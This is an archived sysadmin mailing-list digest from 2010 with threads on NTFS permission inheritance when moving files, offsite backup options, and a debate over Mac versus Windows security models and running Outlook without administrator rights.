distribution, copying or use of the contents of this e-mail, and any 
attachments hereto, is strictly prohibited. If you have received this e-mail in 
error, please immediately notify me by reply email and permanently delete the 
original and any copy of this e-mail and any printout thereof.






~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Crawford, Scott]

The values you want are

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Fo
rceCopyAclwithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Mo
veSecurityAttributes

This KB details this:

http://support.microsoft.com/kb/310316


-Original Message-
From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 12:08 PM
To: NT System Admin Issues
Subject: RE: The finer points of NTFS ACLs (was: Software installs on
new PCs)

+infinity

We do exactly what you describe, and I always have issues (mostly when
doing file migrations due to server moves) related to people copying
files from one secured directory to another and the permissions not
getting updated.  When the permissions are set to inherit from parent,
it seems to me that Windows should re-assess that on a file copy.

Bill Mayo 

-Original Message-
From: Ben Scott [mailto:mailvor...@gmail.com] 
Sent: Wednesday, April 28, 2010 12:45 PM
To: NT System Admin Issues
Subject: The finer points of NTFS ACLs (was: Software installs on new
PCs)

On Wed, Apr 28, 2010 at 11:54 AM, James Rankin 
wrote:
> We see this problem where people create folders under shared drives, 
> that each new folder is owned by the creating user who then has the
added rights.
> The solution is some weekly subinacl tasks that re-take ownership of 
> the whole fileserver structure back to BUILTIN\Administrators

  Wouldn't it be better to just remove "CREATOR OWNER" from the ACL on
the folder?

  All our shared folders are set so only the group(s) which should have
permission are present.

  The only good use for "CREATOR OWNER" I've found is kludging around
apps that insist on writing to their own program directory.  So grant
users "Create File" on "This folder only", and separately grant "CREATOR
OWNER" "Modify" on "Files only".  Now users can create the file, but
can't touch anything else.

  My biggest beef is that if you move an object within a "drive" on
Windows, Windows does not update the ACL on the object to reflect
different permissions in its new location.  So, for example, when a file
is moved from the QA-only pre-release folder to the whole-company
general-release folder, the file still has permissions for pre-release
and nobody else can read it.  Anyone got a fix for *that*?

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
  ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: backup software solution for offsite

[Charlie Kaiser]

Are you saying your OWN datacenter? Or a hosted server in someone else's
datacenter?

***
Charlie Kaiser
charl...@golden-eagle.org
Kingman, AZ
***  

> -Original Message-
> From: justino garcia [mailto:jgarciaitl...@gmail.com] 
> Sent: Wednesday, April 28, 2010 10:19 AM
> To: NT System Admin Issues
> Subject: Re: backup software solution for offsite
> 
> I wish to not hosted on a third party cloud, rather just host 
> on our own server at the data center.
> and Mozy good, but we want a image snapshot.
> 
> Thanks
> 
> 
> On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser 
>  wrote:
> 
> 
>   Check out Mozy Pro (Mozy.com) or Amazon Web Services.
>   
>   ***
>   Charlie Kaiser
>   charl...@golden-eagle.org
>   Kingman, AZ
>   ***
>   
> 
>   > -Original Message-
>   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
>   > Sent: Wednesday, April 28, 2010 10:08 AM
>   > To: NT System Admin Issues
>   > Subject: backup software solution for offsite
>   >
>   > I have a need to setup offsite backsup via a ipsec tunnel,
>   > thru sftp ftp or smb .
>   > Something we can take daily inc snapshots and send over the
>   > internet using vpn, that has retation rules and alerts to
>   > admin (me) if a backup fails.
>   > Any comercial prosuct any ideas?
>   >
>   > Thanks
>   >
>   >
>   > --
>   > Justin
>   > IT-TECH
>   >
>   > ~ Finally, powerful endpoint security that ISN'T a resource
>   > hog! ~ ~
>   >   ~
>   
>   
>   ~ Finally, powerful endpoint security that ISN'T a 
> resource hog! ~
>   ~   ~
>   
> 
> 
> 
> 
> --
> Justin
> IT-TECH
> 
> 
>  
> 
>  
> 
> 


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: WTF? Fake AV

[Phil Brutsche]

My experience has been varied on the issue.

A basic Outlook install works fine without local admin.

Things change when you start using Outlook add-ins. Some aren't as well
behaved as others.

On 4/28/2010 12:27 PM, Steven M. Caesare wrote:
> I’ve supported email since Outlook eclipsed the “Exchange Client”, on
> platforms since NT4.0 and I don’t recall this.


-- 

Phil Brutsche
p...@optimumdata.com

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: WTF? Fake AV

[Phil Brutsche]

Office '97 absolutely had problems with the spell checker when you
weren't local admin. There were permissions changes you could make to
the registry keys to work around the issue.

In my experience Office 2000 was the first version to fix that.

On 4/28/2010 12:25 PM, Maglinger, Paul wrote:
> Microsoft Office used to have issues with spell check and some other
> tools unless you elevated the user to Power User.  I believe it might
> have been Office 2000.  I don’t believe the issue exists anymore.

-- 

Phil Brutsche
p...@optimumdata.com

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV

[Steven M. Caesare]

I've supported email since Outlook eclipsed the "Exchange Client", on
platforms since NT4.0 and I don't recall this.

 

-sc

 

From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 1:21 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

 

I can no longer remember the details, and, as I tried to express, I'm
sure there was a way to make it work.  But, I am certain that it did not
work in a default configuration.  It is possible that it was an issue
with Windows 2000, and not XP; too long ago to really remember.

 

Bill Mayo

 



From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 1:18 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV

No, I have all my users running Outlook (2003 and 2007 and 2010) without
any special group membership...just regular users.  

On Wed, Apr 28, 2010 at 12:14 PM, Mayo, Bill 
wrote:

I didn't mean to imply that you had to be an admin, but you can't run
Outlook 2003 on Windows 2000/XP as a regular user out of the box (I
assume the same would be true even if the OS was a higher version, but I
don't know).

When we were going to XP (many years ago), we wanted to change our staff
to be just regular users (member of Users group only) on the computers
at the same time and did testing.  We found that you could not run
Outlook 2003, unless you were at least a member of Power Users.  As you
know, being a Power User is not a whole lot different than being an
administrator (many documented ways for a Power User to make themselves
an Administrator if desired).  These days, you can use tools like LUA
Buglight to figure out how to tweak the permissions to account for such
things.

To this day, we still run into stuff from vendors that "require"
administrator permissions to run. (Again, reference the LUA Buglight
comment above.)

Bill Mayo


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 1:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

" I mean, when you cannot even run Outlook without elevated permissions,
it becomes kind of pointless (based on Outlook
2003 not working as a regular user)."

What?

We have 1000's of non-admin Outlook users. Going back a couple of
versions.

-sc

> -Original Message-
> From: Mayo, Bill [mailto:bem...@pittcountync.gov]
> Sent: Wednesday, April 28, 2010 1:03 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> That one sent me to Google.  The quote is accurate, but I thought the
stated
> reason was interesting as well.  As I interpet it, he says that in
most any
> browser it is easy to find bugs (in which he can place things into
memory),
> but that the actual exploit is easier in Mac OS because "I put the
code into a
> process and I know exactly where it's going to be".  I have to assume
that is a
> browser issue, not an OS issue, because Mac OS X has been using
"system
> library randomization"
> for a while now.  (I understand that the OS needs to control/limit
what the
> application does.)  As I have said before on this forum, you can say
what you
> will about the reasons why there is an extremely minimal amount of
malware
> on the Mac as compared to Windows (70,000 new per day!), but the fact
> remains that you are much "safer" running Mac OS X today than you are
> Windows.  Mac OS X does have some issues that need to be addressed,
and I
> think you will see more of that real soon now, as they have recently
had
> some high profile hires in that area.
>
> That said, I still think the original statement that the "security
model is
> better" is something of a different animal.  The security model to me
is more
> of a general philosophy of how the user relates to the operating
system.
> Mac OS X, which is based on BSD Unix, uses the multi-user,
least-privilege
> model and has since day 1.  Whether designed for it or not, that has
not been
> the model in use in the Windows world until relatively recently.  I
mean,
> when you cannot even run Outlook without elevated permissions, it
> becomes kind of pointless (based on Outlook
> 2003 not working as a regular user).
>
> Bill Mayo
>
> -Original Message-
> From: Angus Scott-Fleming [mailto:angu...@geoapps.com]
> Sent: Wednesday, April 28, 2010 12:27 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
>
> On 28 Apr 2010 at 11:00, Steven M. Caesare  wrote:
>
> > > While I am not a huge fan of MACS, their security model is
obviously
>
> > > much
> > better than Windows
> >
> > I'd suggest that's an ill-drawn conclusion.
>
> +1.  Charlie Miller, the Pwn20wn champ three years running, hacks Macs

> +by
> choice over Windows because he says they're easier to hack.
>
> --
> Angus Scott-Fleming
> GeoApps, Tucson, Arizona
> 1-520-290-5038
> Security Blog: http://geoapps.com/
>
>
>
>
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
> 

RE: WTF? Fake AV

[Steven M. Caesare]

Likewise. I dunno what Bill is experiencing.

 

-sc

 

From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 1:18 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV

 

No, I have all my users running Outlook (2003 and 2007 and 2010) without
any special group membership...just regular users.  

On Wed, Apr 28, 2010 at 12:14 PM, Mayo, Bill 
wrote:

I didn't mean to imply that you had to be an admin, but you can't run
Outlook 2003 on Windows 2000/XP as a regular user out of the box (I
assume the same would be true even if the OS was a higher version, but I
don't know).

When we were going to XP (many years ago), we wanted to change our staff
to be just regular users (member of Users group only) on the computers
at the same time and did testing.  We found that you could not run
Outlook 2003, unless you were at least a member of Power Users.  As you
know, being a Power User is not a whole lot different than being an
administrator (many documented ways for a Power User to make themselves
an Administrator if desired).  These days, you can use tools like LUA
Buglight to figure out how to tweak the permissions to account for such
things.

To this day, we still run into stuff from vendors that "require"
administrator permissions to run. (Again, reference the LUA Buglight
comment above.)

Bill Mayo


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 1:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

" I mean, when you cannot even run Outlook without elevated permissions,
it becomes kind of pointless (based on Outlook
2003 not working as a regular user)."

What?

We have 1000's of non-admin Outlook users. Going back a couple of
versions.

-sc

> -Original Message-
> From: Mayo, Bill [mailto:bem...@pittcountync.gov]
> Sent: Wednesday, April 28, 2010 1:03 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> That one sent me to Google.  The quote is accurate, but I thought the
stated
> reason was interesting as well.  As I interpet it, he says that in
most any
> browser it is easy to find bugs (in which he can place things into
memory),
> but that the actual exploit is easier in Mac OS because "I put the
code into a
> process and I know exactly where it's going to be".  I have to assume
that is a
> browser issue, not an OS issue, because Mac OS X has been using
"system
> library randomization"
> for a while now.  (I understand that the OS needs to control/limit
what the
> application does.)  As I have said before on this forum, you can say
what you
> will about the reasons why there is an extremely minimal amount of
malware
> on the Mac as compared to Windows (70,000 new per day!), but the fact
> remains that you are much "safer" running Mac OS X today than you are
> Windows.  Mac OS X does have some issues that need to be addressed,
and I
> think you will see more of that real soon now, as they have recently
had
> some high profile hires in that area.
>
> That said, I still think the original statement that the "security
model is
> better" is something of a different animal.  The security model to me
is more
> of a general philosophy of how the user relates to the operating
system.
> Mac OS X, which is based on BSD Unix, uses the multi-user,
least-privilege
> model and has since day 1.  Whether designed for it or not, that has
not been
> the model in use in the Windows world until relatively recently.  I
mean,
> when you cannot even run Outlook without elevated permissions, it
> becomes kind of pointless (based on Outlook
> 2003 not working as a regular user).
>
> Bill Mayo
>
> -Original Message-
> From: Angus Scott-Fleming [mailto:angu...@geoapps.com]
> Sent: Wednesday, April 28, 2010 12:27 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
>
> On 28 Apr 2010 at 11:00, Steven M. Caesare  wrote:
>
> > > While I am not a huge fan of MACS, their security model is
obviously
>
> > > much
> > better than Windows
> >
> > I'd suggest that's an ill-drawn conclusion.
>
> +1.  Charlie Miller, the Pwn20wn champ three years running, hacks Macs

> +by
> choice over Windows because he says they're easier to hack.
>
> --
> Angus Scott-Fleming
> GeoApps, Tucson, Arizona
> 1-520-290-5038
> Security Blog: http://geoapps.com/
>
>
>
>
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
>   ~
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
>   ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
  ~




~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

 

 

 

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~ 

RE: WTF? Fake AV

[Maglinger, Paul]

Microsoft Office used to have issues with spell check and some other
tools unless you elevated the user to Power User.  I believe it might
have been Office 2000.  I don't believe the issue exists anymore.

 

 

From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 12:21 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

 

I can no longer remember the details, and, as I tried to express, I'm
sure there was a way to make it work.  But, I am certain that it did not
work in a default configuration.  It is possible that it was an issue
with Windows 2000, and not XP; too long ago to really remember.

 

Bill Mayo

 



From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 1:18 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV

No, I have all my users running Outlook (2003 and 2007 and 2010) without
any special group membership...just regular users.  

On Wed, Apr 28, 2010 at 12:14 PM, Mayo, Bill 
wrote:

I didn't mean to imply that you had to be an admin, but you can't run
Outlook 2003 on Windows 2000/XP as a regular user out of the box (I
assume the same would be true even if the OS was a higher version, but I
don't know).

When we were going to XP (many years ago), we wanted to change our staff
to be just regular users (member of Users group only) on the computers
at the same time and did testing.  We found that you could not run
Outlook 2003, unless you were at least a member of Power Users.  As you
know, being a Power User is not a whole lot different than being an
administrator (many documented ways for a Power User to make themselves
an Administrator if desired).  These days, you can use tools like LUA
Buglight to figure out how to tweak the permissions to account for such
things.

To this day, we still run into stuff from vendors that "require"
administrator permissions to run. (Again, reference the LUA Buglight
comment above.)

Bill Mayo


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 1:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

" I mean, when you cannot even run Outlook without elevated permissions,
it becomes kind of pointless (based on Outlook
2003 not working as a regular user)."

What?

We have 1000's of non-admin Outlook users. Going back a couple of
versions.

-sc

> -Original Message-
> From: Mayo, Bill [mailto:bem...@pittcountync.gov]
> Sent: Wednesday, April 28, 2010 1:03 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> That one sent me to Google.  The quote is accurate, but I thought the
stated
> reason was interesting as well.  As I interpet it, he says that in
most any
> browser it is easy to find bugs (in which he can place things into
memory),
> but that the actual exploit is easier in Mac OS because "I put the
code into a
> process and I know exactly where it's going to be".  I have to assume
that is a
> browser issue, not an OS issue, because Mac OS X has been using
"system
> library randomization"
> for a while now.  (I understand that the OS needs to control/limit
what the
> application does.)  As I have said before on this forum, you can say
what you
> will about the reasons why there is an extremely minimal amount of
malware
> on the Mac as compared to Windows (70,000 new per day!), but the fact
> remains that you are much "safer" running Mac OS X today than you are
> Windows.  Mac OS X does have some issues that need to be addressed,
and I
> think you will see more of that real soon now, as they have recently
had
> some high profile hires in that area.
>
> That said, I still think the original statement that the "security
model is
> better" is something of a different animal.  The security model to me
is more
> of a general philosophy of how the user relates to the operating
system.
> Mac OS X, which is based on BSD Unix, uses the multi-user,
least-privilege
> model and has since day 1.  Whether designed for it or not, that has
not been
> the model in use in the Windows world until relatively recently.  I
mean,
> when you cannot even run Outlook without elevated permissions, it
> becomes kind of pointless (based on Outlook
> 2003 not working as a regular user).
>
> Bill Mayo
>
> -Original Message-
> From: Angus Scott-Fleming [mailto:angu...@geoapps.com]
> Sent: Wednesday, April 28, 2010 12:27 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
>
> On 28 Apr 2010 at 11:00, Steven M. Caesare  wrote:
>
> > > While I am not a huge fan of MACS, their security model is
obviously
>
> > > much
> > better than Windows
> >
> > I'd suggest that's an ill-drawn conclusion.
>
> +1.  Charlie Miller, the Pwn20wn champ three years running, hacks Macs

> +by
> choice over Windows because he says they're easier to hack.
>
> --
> Angus Scott-Fleming
> GeoApps, Tucson, Arizona
> 1-520-290-5038
> Security Blog: http://geoapps.com/
>
>
>
>
>
> ~ Finally, powerful endpoint security that I

RE: WTF? Fake AV

[Mayo, Bill]

You know, the more I think about it, it may have been Outlook 97 with
Windows 2000.  Regardless, Windows 2000 was the first user OS using the
NT security model, and the completely necessary email client that was
then available would not work in a least-privileged mode, which was my
intended point.  Sorry for any confusion I generated with my spotty
memory.
 
Bill Mayo



From: Mayo, Bill 
Sent: Wednesday, April 28, 2010 1:21 PM
To: 'NT System Admin Issues'
Subject: RE: WTF? Fake AV


I can no longer remember the details, and, as I tried to express, I'm
sure there was a way to make it work.  But, I am certain that it did not
work in a default configuration.  It is possible that it was an issue
with Windows 2000, and not XP; too long ago to really remember.
 
Bill Mayo



From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 1:18 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV


No, I have all my users running Outlook (2003 and 2007 and 2010) without
any special group membership...just regular users.  


On Wed, Apr 28, 2010 at 12:14 PM, Mayo, Bill 
wrote:


I didn't mean to imply that you had to be an admin, but you
can't run
Outlook 2003 on Windows 2000/XP as a regular user out of the box
(I
assume the same would be true even if the OS was a higher
version, but I
don't know).

When we were going to XP (many years ago), we wanted to change
our staff
to be just regular users (member of Users group only) on the
computers
at the same time and did testing.  We found that you could not
run
Outlook 2003, unless you were at least a member of Power Users.
As you
know, being a Power User is not a whole lot different than being
an
administrator (many documented ways for a Power User to make
themselves
an Administrator if desired).  These days, you can use tools
like LUA
Buglight to figure out how to tweak the permissions to account
for such
things.

To this day, we still run into stuff from vendors that "require"
administrator permissions to run. (Again, reference the LUA
Buglight
comment above.)

Bill Mayo


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 1:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

" I mean, when you cannot even run Outlook without elevated
permissions,
it becomes kind of pointless (based on Outlook
2003 not working as a regular user)."

What?

We have 1000's of non-admin Outlook users. Going back a couple
of
versions.

-sc

> -Original Message-
> From: Mayo, Bill [mailto:bem...@pittcountync.gov]
> Sent: Wednesday, April 28, 2010 1:03 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> That one sent me to Google.  The quote is accurate, but I
thought the
stated
> reason was interesting as well.  As I interpet it, he says
that in
most any
> browser it is easy to find bugs (in which he can place things
into
memory),
> but that the actual exploit is easier in Mac OS because "I put
the
code into a
> process and I know exactly where it's going to be".  I have to
assume
that is a
> browser issue, not an OS issue, because Mac OS X has been
using
"system
> library randomization"
> for a while now.  (I understand that the OS needs to
control/limit
what the
> application does.)  As I have said before on this forum, you
can say
what you
> will about the reasons why there is an extremely minimal
amount of
malware
> on the Mac as compared to Windows (70,000 new per day!), but
the fact
> remains that you are much "safer" running Mac OS X today than
you are
> Windows.  Mac OS X does have some issues that need to be
addressed,
and I
> think you will see more of that real soon now, as they have
recently
had
> some high profile hires in that area.
>
> That said, I still think the original statement that the
"security
model is
> better" is something of a different animal.  The security
model to me
is more
> of a general philosophy of how the user relates to the
operating
system.
> Mac OS X, which is based on BSD Unix, uses the multi-user,
least-privilege
> model and has since day 1.  Whether designed for it or not,
that has
not been
> the model in use in the Windows world until relatively
recently.  I
mean,
> when you cannot even run Outlook without elevated permi

RE: WTF? Fake AV

[Steven M. Caesare]

Let's not out words in my mouth, OK? I'm not arguing that the Win7
security model is "so much better than the OS/X security model."

My stance is that the conclusion that was stated: The Mac OS is superior
to Win 7 from   security model perspective based on virus infection
numbers is flawed.

I've said before, and I'll say again: If you want to argue that the
choices made for defaults in that model were not clamped down quickly
enough in the name of compatibility, I might even be inclined to agree
with you. 

But the mechanisms are there, and as of the last few years, much more
sensible in terms of defaults, IMO.

-sc

> -Original Message-
> From: John Aldrich [mailto:jaldr...@blueridgecarpet.com]
> Sent: Wednesday, April 28, 2010 1:05 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> Ok, Steven. As you say, the OP was comparing Win 7 with OS/X. Tell me
why
> you think the *current* Windows security model is so much better than
the
> OS/X security model? It would seem to me that the Linux\Unix\OS/x
security
> model would be stronger than Windows, as at least in Linux, if you try
to
> install something as a user it simply fails stating you don't have
permission,
> but in Windows, UAC actually *prompts* you to escalate privileges. At
least
> that's the way I see things (from a limited experience with Win Vista
and Win
> 7.)
> 
> 
> 
> 
> -Original Message-
> From: Steven M. Caesare [mailto:scaes...@caesare.com]
> Sent: Wednesday, April 28, 2010 12:54 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> A) hardware driver models are a somewhat different beast, and that's
held
> true for many a platform, and isn't really germane to what we are
discussing
> here.
> 
> B) MS provided that info to HW devs FAR in advance.
> 
> 
> The point is, carrying forward a user base in the 100's of millions
and an app
> base in the 10's of thousands requires some significant transitioning.
Now
> you can argue their timeing all you want, but the OP's comment had two
> basic tennents that bear on this:
> 
> 1) He was comparing current day OS's (i.e. Win7 vs "the Mac")
> 
> 2) He was discussing the OS, not the apps written for them
> 
> Using AV infection #'s to compare those things and draw the conclusion
he
> did is no accurate, IMO.
> 
> -sc
> 
> > -Original Message-
> > From: Ben Scott [mailto:mailvor...@gmail.com]
> > Sent: Wednesday, April 28, 2010 12:47 PM
> > To: NT System Admin Issues
> > Subject: Re: WTF? Fake AV
> >
> > On Wed, Apr 28, 2010 at 11:56 AM, Steven M. Caesare
> >  wrote:
> > >> " But when Microsoft wants to, say, create a new API for
something,
> > >> they just do, and abandon the old one, and everyone else has to
> play
> > catchup"
> > >
> > > I guess I haven't seen those multitude of Technet articles ...
> >
> >   Yah, tell that to anyone who had hardware that lacks Vista
drivers.
> > Or has stuff written around Office 97-2003.  The fact that sometimes
> > Microsoft plays nice doesn't mean they always do.
> >
> > -- Ben
> >
> > ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
> >   ~
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
>   ~
> 
> 
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
>   ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV

[Mayo, Bill]

I can no longer remember the details, and, as I tried to express, I'm
sure there was a way to make it work.  But, I am certain that it did not
work in a default configuration.  It is possible that it was an issue
with Windows 2000, and not XP; too long ago to really remember.
 
Bill Mayo



From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 1:18 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV


No, I have all my users running Outlook (2003 and 2007 and 2010) without
any special group membership...just regular users.  


On Wed, Apr 28, 2010 at 12:14 PM, Mayo, Bill 
wrote:


I didn't mean to imply that you had to be an admin, but you
can't run
Outlook 2003 on Windows 2000/XP as a regular user out of the box
(I
assume the same would be true even if the OS was a higher
version, but I
don't know).

When we were going to XP (many years ago), we wanted to change
our staff
to be just regular users (member of Users group only) on the
computers
at the same time and did testing.  We found that you could not
run
Outlook 2003, unless you were at least a member of Power Users.
As you
know, being a Power User is not a whole lot different than being
an
administrator (many documented ways for a Power User to make
themselves
an Administrator if desired).  These days, you can use tools
like LUA
Buglight to figure out how to tweak the permissions to account
for such
things.

To this day, we still run into stuff from vendors that "require"
administrator permissions to run. (Again, reference the LUA
Buglight
comment above.)

Bill Mayo


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 1:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

" I mean, when you cannot even run Outlook without elevated
permissions,
it becomes kind of pointless (based on Outlook
2003 not working as a regular user)."

What?

We have 1000's of non-admin Outlook users. Going back a couple
of
versions.

-sc

> -Original Message-
> From: Mayo, Bill [mailto:bem...@pittcountync.gov]
> Sent: Wednesday, April 28, 2010 1:03 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> That one sent me to Google.  The quote is accurate, but I
thought the
stated
> reason was interesting as well.  As I interpet it, he says
that in
most any
> browser it is easy to find bugs (in which he can place things
into
memory),
> but that the actual exploit is easier in Mac OS because "I put
the
code into a
> process and I know exactly where it's going to be".  I have to
assume
that is a
> browser issue, not an OS issue, because Mac OS X has been
using
"system
> library randomization"
> for a while now.  (I understand that the OS needs to
control/limit
what the
> application does.)  As I have said before on this forum, you
can say
what you
> will about the reasons why there is an extremely minimal
amount of
malware
> on the Mac as compared to Windows (70,000 new per day!), but
the fact
> remains that you are much "safer" running Mac OS X today than
you are
> Windows.  Mac OS X does have some issues that need to be
addressed,
and I
> think you will see more of that real soon now, as they have
recently
had
> some high profile hires in that area.
>
> That said, I still think the original statement that the
"security
model is
> better" is something of a different animal.  The security
model to me
is more
> of a general philosophy of how the user relates to the
operating
system.
> Mac OS X, which is based on BSD Unix, uses the multi-user,
least-privilege
> model and has since day 1.  Whether designed for it or not,
that has
not been
> the model in use in the Windows world until relatively
recently.  I
mean,
> when you cannot even run Outlook without elevated permissions,
it
> becomes kind of pointless (based on Outlook
> 2003 not working as a regular user).
>
> Bill Mayo
>
> -Original Message-
> From: Angus Scott-Fleming [mailto:angu...@geoapps.com]
> Sent: Wednesday, April 28, 2010 12:27 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
>
> On 28 Apr 2010 at 11:00, Steven M. Caesare  wrote:
>
> > > While I am not a huge fan of MACS, their securit

Outlook 2K3 as non admin (was RE: WTF? Fake AV)

[David Lum]

Outlook 2003 doesn't work as a regular user? I have seen issues if 2003 was 
configured for a local admin and then they are removed from local admin, but I 
have Outlook 2003 working for non-admins and have for some years now.

Dave

-Original Message-
From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 10:03 AM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

That one sent me to Google.  The quote is accurate, but I thought the
stated reason was interesting as well.  As I interpet it, he says that
in most any browser it is easy to find bugs (in which he can place
things into memory), but that the actual exploit is easier in Mac OS
because "I put the code into a process and I know exactly where it's
going to be".  I have to assume that is a browser issue, not an OS
issue, because Mac OS X has been using "system library randomization"
for a while now.  (I understand that the OS needs to control/limit what
the application does.)  As I have said before on this forum, you can say
what you will about the reasons why there is an extremely minimal amount
of malware on the Mac as compared to Windows (70,000 new per day!), but
the fact remains that you are much "safer" running Mac OS X today than
you are Windows.  Mac OS X does have some issues that need to be
addressed, and I think you will see more of that real soon now, as they
have recently had some high profile hires in that area.

That said, I still think the original statement that the "security model
is better" is something of a different animal.  The security model to me
is more of a general philosophy of how the user relates to the operating
system.  Mac OS X, which is based on BSD Unix, uses the multi-user,
least-privilege model and has since day 1.  Whether designed for it or
not, that has not been the model in use in the Windows world until
relatively recently.  I mean, when you cannot even run Outlook without
elevated permissions, it becomes kind of pointless (based on Outlook
2003 not working as a regular user).

Bill Mayo

-Original Message-
From: Angus Scott-Fleming [mailto:angu...@geoapps.com] 
Sent: Wednesday, April 28, 2010 12:27 PM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV

On 28 Apr 2010 at 11:00, Steven M. Caesare  wrote:

> > While I am not a huge fan of MACS, their security model is obviously

> > much
> better than Windows
> 
> I'd suggest that's an ill-drawn conclusion.

+1.  Charlie Miller, the Pwn20wn champ three years running, hacks Macs 
+by
choice over Windows because he says they're easier to hack.

--
Angus Scott-Fleming
GeoApps, Tucson, Arizona
1-520-290-5038
Security Blog: http://geoapps.com/





~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
  ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~




~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: backup software solution for offsite

[justino garcia]

I wish to not hosted on a third party cloud, rather just host on our own
server at the data center.
and Mozy good, but we want a image snapshot.

Thanks

On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser
wrote:

> Check out Mozy Pro (Mozy.com) or Amazon Web Services.
>
> ***
> Charlie Kaiser
> charl...@golden-eagle.org
> Kingman, AZ
> ***
>
> > -Original Message-
> > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> > Sent: Wednesday, April 28, 2010 10:08 AM
> > To: NT System Admin Issues
> > Subject: backup software solution for offsite
> >
> > I have a need to setup offsite backsup via a ipsec tunnel,
> > thru sftp ftp or smb .
> > Something we can take daily inc snapshots and send over the
> > internet using vpn, that has retation rules and alerts to
> > admin (me) if a backup fails.
> > Any comercial prosuct any ideas?
> >
> > Thanks
> >
> >
> > --
> > Justin
> > IT-TECH
> >
> > ~ Finally, powerful endpoint security that ISN'T a resource
> > hog! ~ ~
> >   ~
>
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>



-- 
Justin
IT-TECH

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~